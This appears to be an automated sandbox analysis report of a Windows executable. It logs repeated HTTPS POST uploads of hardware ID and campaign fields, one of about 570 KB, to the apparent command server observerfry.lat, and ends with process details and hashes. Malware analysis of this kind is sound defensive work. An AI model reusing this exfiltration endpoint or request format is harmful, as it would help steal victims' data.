2024-12-24 07:35:36 UTC | 1369 | IN | Data Raw: 64 4a 2f 34 67 63 4b 73 71 32 66 57 47 68 48 39 76 7a 74 47 34 47 61 50 70 42 49 4e 67 46 64 45 35 55 4c 2f 6e 55 4f 6a 76 37 42 41 30 62 2b 4a 6c 4f 2b 6e 57 74 59 4f 42 63 53 58 41 51 66 4f 51 71 2b 5a 56 67 65 6e 41 6b 69 52 53 71 2f 55 63 65 37 37 73 44 48 66 2b 64 47 4d 35 36 6b 76 30 52 46 4c 6d 39 46 43 45 62 4d 79 77 76 4e 47 4e 4f 34 4f 53 72 4d 4e 35 35 63 30 6f 2b 57 77 4a 39 2b 34 6b 73 61 6c 34 57 7a 44 41 30 7a 39 76 7a 64 45 34 57 43 44 73 77 4d 6b 6e 69 6b 66 70 6b 4f 78 77 6d 7a 79 74 37 34 2f 6b 4c 2f 4a 37 66 65 76 4c 2b 70 4f 53 39 76 42 53 41 72 54 59 70 75 74 45 7a 32 78 57 69 32 72 53 72 37 54 61 76 54 34 73 44 48 66 2b 64 47 4d 35 61 6b 76 30 52 46 4c 6d 39 46 43 45 62 4d 79 77 76 4e 47 4e 4f 34 4f 53 72 4d 4e 35 35 63 30 6f 2b 57
Data Ascii: dJ/4gcKsq2fWGhH9vztG4GaPpBINgFdE5UL/nUOjv7BA0b+JlO+nWtYOBcSXAQfOQq+ZVgenAkiRSq/Uce77sDHf+dGM56kv0RFLm9FCEbMywvNGNO4OSrMN55c0o+WwJ9+4ksal4WzDA0z9vzdE4WCDswMknikfpkOxwmzyt74/kL/J7fevL+pOS9vBSArTYputEz2xWi2rSr7TavT4sDHf+dGM5akv0RFLm9FCEbMywvNGNO4OSrMN55c0o+W
2024-12-24 07:35:36 UTC | 1369 | IN | Data Raw: 49 66 58 39 36 6b 76 32 55 42 54 67 34 41 61 57 75 74 75 6b 75 38 54 4d 61 64 58 52 4f 56 44 2f 35 30 36 34 76 33 67 63 70 44 34 33 64 4b 35 36 53 2f 4b 54 68 4b 44 6c 31 41 53 74 53 2f 56 73 56 52 7a 34 46 41 4a 74 31 2b 35 78 6d 7a 67 73 4d 35 42 73 75 32 57 78 4c 53 6c 58 74 67 45 48 64 61 43 41 45 33 59 58 37 69 78 45 7a 75 6a 56 54 75 7a 54 72 2f 4c 66 61 4f 35 73 47 66 66 70 39 48 35 70 65 42 2f 31 6b 42 46 67 34 31 51 45 71 5a 73 68 36 51 45 4b 4f 77 51 45 4b 49 4e 6f 49 74 6a 6f 2b 47 77 4a 38 79 78 30 63 62 33 76 79 2b 53 44 67 62 43 67 68 35 4a 39 48 4f 54 6f 41 49 6f 35 79 6b 30 69 46 2b 34 31 58 6d 68 78 76 31 37 69 65 71 53 78 4c 44 5a 55 66 67 53 44 4e 4f 43 55 6d 62 68 62 4a 6d 64 4b 68 79 78 45 42 72 6e 61 37 7a 54 65 61 4f 35 73 47 66 66
Data Ascii: IfX96kv2UBTg4AaWutuku8TMadXROVD/5064v3gcpD43dK56S/KThKDl1AStS/VsVRz4FAJt1+5xmzgsM5Bsu2WxLSlXtgEHdaCAE3YX7ixEzujVTuzTr/LfaO5sGffp9H5peB/1kBFg41QEqZsh6QEKOwQEKINoItjo+GwJ8yx0cb3vy+SDgbCgh5J9HOToAIo5yk0iF+41Xmhxv17ieqSxLDZUfgSDNOCUmbhbJmdKhyxEBrna7zTeaO5sGff


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 172.67.199.72 | 443 | 7412 | C:\Users\user\Desktop\yO9EAqDV15.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 07:35:38 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=YQQFKK6DE2Y0H6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18139
Host: observerfry.lat
2024-12-24 07:35:38 UTC | 15331 | OUT | Data Raw: 2d 2d 59 51 51 46 4b 4b 36 44 45 32 59 30 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 36 30 30 42 36 39 34 33 31 46 44 31 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 59 51 51 46 4b 4b 36 44 45 32 59 30 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 51 51 46 4b 4b 36 44 45 32 59 30 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 59 51 51 46 4b 4b 36 44
Data Ascii: --YQQFKK6DE2Y0H6Content-Disposition: form-data; name="hwid"9A9600B69431FD17BEBA0C6A975F1733--YQQFKK6DE2Y0H6Content-Disposition: form-data; name="pid"2--YQQFKK6DE2Y0H6Content-Disposition: form-data; name="lid"PsFKDg--pablo--YQQFKK6D
2024-12-24 07:35:38 UTC | 2808 | OUT | Data Raw: e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11
Data Ascii: (u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2024-12-24 07:35:38 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 07:35:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3h1ltlthjq14qh16c24g2dcb3n; expires=Sat, 19 Apr 2025 01:22:17 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qqqJpoCNy1BXboGARb4Z0GVXdQkEIpoC1lVkhFpozft%2BttzJ9LFhUUBCi0OIlGWfRsHzOs9RgLNlawVEz%2FhS6DFGtCNoWHQ8fpE0ijj1rlRAMiJJOmovQhMflThPZdu36CE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6eea6fdde50f3f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1453&min_rtt=1446&rtt_var=556&sent=15&recv=21&lost=0&retrans=0&sent_bytes=2836&recv_bytes=19096&delivery_rate=1944074&cwnd=193&unsent_bytes=0&cid=020ef3388502d708&ts=1201&x=0"
2024-12-24 07:35:38 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 07:35:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 172.67.199.72 | 443 | 7412 | C:\Users\user\Desktop\yO9EAqDV15.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 07:35:40 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KC6ECR53FPBPHPG89
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8778
Host: observerfry.lat
2024-12-24 07:35:40 UTC | 8778 | OUT | Data Raw: 2d 2d 4b 43 36 45 43 52 35 33 46 50 42 50 48 50 47 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 36 30 30 42 36 39 34 33 31 46 44 31 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 43 36 45 43 52 35 33 46 50 42 50 48 50 47 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 43 36 45 43 52 35 33 46 50 42 50 48 50 47 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
Data Ascii: --KC6ECR53FPBPHPG89Content-Disposition: form-data; name="hwid"9A9600B69431FD17BEBA0C6A975F1733--KC6ECR53FPBPHPG89Content-Disposition: form-data; name="pid"2--KC6ECR53FPBPHPG89Content-Disposition: form-data; name="lid"PsFKDg--pablo-
2024-12-24 07:35:41 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Tue, 24 Dec 2024 07:35:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=kij3lnbubkfubhg0n93q009f90; expires=Sat, 19 Apr 2025 01:22:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CCpKk2Yg6VpEpKLOqW9GO4zk4sbH%2FRATScMZwKR%2BP5NYWQiXnGxu8z0VYE1DKXCVvmS0wFHkA03ho6I%2FVP8pCku1zg%2FTWoVknaWlQZ2ICFzddXUh6l50qlSVKJiq66H6WG4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6eea7e1dab8c90-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1772&rtt_var=681&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9715&delivery_rate=1586956&cwnd=201&unsent_bytes=0&cid=dd338d2c02842005&ts=783&x=0"
2024-12-24 07:35:41 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 07:35:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.4 | 49734       | 172.67.199.72  | 443              | 7412 | C:\Users\user\Desktop\yO9EAqDV15.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 07:35:42 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=SGHG9EE2
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 20377
                                                                                                            Host: observerfry.lat
2024-12-24 07:35:42 UTC | 15331 | OUT | Data Raw: 2d 2d 53 47 48 47 39 45 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 36 30 30 42 36 39 34 33 31 46 44 31 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 53 47 48 47 39 45 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 47 48 47 39 45 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 53 47 48 47 39 45 45 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
Data Ascii: --SGHG9EE2Content-Disposition: form-data; name="hwid"9A9600B69431FD17BEBA0C6A975F1733--SGHG9EE2Content-Disposition: form-data; name="pid"3--SGHG9EE2Content-Disposition: form-data; name="lid"PsFKDg--pablo--SGHG9EE2Content-Disposit
2024-12-24 07:35:43 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Tue, 24 Dec 2024 07:35:43 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=3d1rkaa5cl4f8h5k99vfqh87gb; expires=Sat, 19 Apr 2025 01:22:22 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DmkyA0lVSx93%2FnSIE3FnbLYJQCPBQNeyoFahPBoIdnLcUb2nYXY1jtN%2B1Sug6vngaaQBgszD0%2FMlqehkKnFMfZtO2tFAhgBqj2qMR3Aepeq4bVqDmrBhMC5NIodHZpNJtVc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6eea8bfa8142e2-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1735&rtt_var=658&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21328&delivery_rate=1655328&cwnd=187&unsent_bytes=0&cid=13fb1fdb0fb7fd77&ts=960&x=0"
2024-12-24 07:35:43 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 07:35:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.4 | 49735       | 172.67.199.72  | 443              | 7412 | C:\Users\user\Desktop\yO9EAqDV15.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 07:35:45 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=851Y5PCU9
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 1211
                                                                                                            Host: observerfry.lat
2024-12-24 07:35:45 UTC | 1211 | OUT | Data Raw: 2d 2d 38 35 31 59 35 50 43 55 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 36 30 30 42 36 39 34 33 31 46 44 31 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 38 35 31 59 35 50 43 55 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 35 31 59 35 50 43 55 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 38 35 31 59 35 50 43 55 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
Data Ascii: --851Y5PCU9Content-Disposition: form-data; name="hwid"9A9600B69431FD17BEBA0C6A975F1733--851Y5PCU9Content-Disposition: form-data; name="pid"1--851Y5PCU9Content-Disposition: form-data; name="lid"PsFKDg--pablo--851Y5PCU9Content-Disp
2024-12-24 07:35:45 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Tue, 24 Dec 2024 07:35:45 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=8joal0vvq70a0n496nvrolsjd0; expires=Sat, 19 Apr 2025 01:22:24 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FK0oSCXCvj%2FPpOcsSpRoUUXbQCe6inqyXwTyGdbpSi%2BAzoIRcxErP5kzMq%2Fn7eeqQMQZi9RejTLpRmYfFDA%2FhwE8bHAwpu58hpyKB1t8d70wwDEHWhUMXbhMXYPOWT21VM0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6eea9c5e09423d-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1727&rtt_var=665&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2118&delivery_rate=1623123&cwnd=186&unsent_bytes=0&cid=0bea81cda9721f35&ts=776&x=0"
2024-12-24 07:35:45 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 07:35:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.4 | 49737       | 172.67.199.72  | 443              | 7412 | C:\Users\user\Desktop\yO9EAqDV15.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 07:35:47 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=VIKTP4GUVP9FTTVZ8IE
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 571708
                                                                                                            Host: observerfry.lat
2024-12-24 07:35:47 UTC | 15331 | OUT | Data Raw: 2d 2d 56 49 4b 54 50 34 47 55 56 50 39 46 54 54 56 5a 38 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 39 36 30 30 42 36 39 34 33 31 46 44 31 37 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 49 4b 54 50 34 47 55 56 50 39 46 54 54 56 5a 38 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 49 4b 54 50 34 47 55 56 50 39 46 54 54 56 5a 38 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
Data Ascii: --VIKTP4GUVP9FTTVZ8IEContent-Disposition: form-data; name="hwid"9A9600B69431FD17BEBA0C6A975F1733--VIKTP4GUVP9FTTVZ8IEContent-Disposition: form-data; name="pid"1--VIKTP4GUVP9FTTVZ8IEContent-Disposition: form-data; name="lid"PsFKDg--pa
2024-12-24 07:35:51 UTC | 1126 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Tue, 24 Dec 2024 07:35:50 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=2dba21g57vjllo96puktgo6m5g; expires=Sat, 19 Apr 2025 01:22:28 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oe06UGlooXujhUTuH07FiLp60MAMHTIuHGeq26YWlXVf6UYE4qxcyyD%2Fq29zHleHy6jkIvtgobrcFXIbW8QHIeifteY6EsIC5f3iQVoMbh0OHppwvvajzpsty0JrExYxqBU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6eeaabeb208c60-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1802&rtt_var=681&sent=360&recv=593&lost=0&retrans=0&sent_bytes=2836&recv_bytes=574255&delivery_rate=1600877&cwnd=67&unsent_bytes=0&cid=a7368bd7633b512a&ts=3343&x=0"



Target ID: 0
Start time: 02:35:28
Start date: 24/12/2024
Path: C:\Users\user\Desktop\yO9EAqDV15.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\yO9EAqDV15.exe"
Imagebase: 0xcb0000
File size: 1'884'672 bytes
MD5 hash: DCBBFBD538D99FEEC781122F6C905C1B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Memory Dump Source
• Source File: 00000000.00000003.2126425221.00000000017DB000.00000004.00000020.00020000.00000000.sdmp, Offset: 017DB000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_17db000_yO9EAqDV15.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d34e622916fb08eb62458b47bd9892b1e8e45896efd5a233bc1f98f6ef28fafd
• Instruction ID: 8dda80d5cbe86a9a68204070d023702e10c7f6e017521e8d7eb9b9cb4044ae5f
• Opcode Fuzzy Hash: d34e622916fb08eb62458b47bd9892b1e8e45896efd5a233bc1f98f6ef28fafd
• Instruction Fuzzy Hash: A0E18B6644E3D18FD7138B389866295BFF1AF57220B9E44DBC0C0CF0B3E269495AC762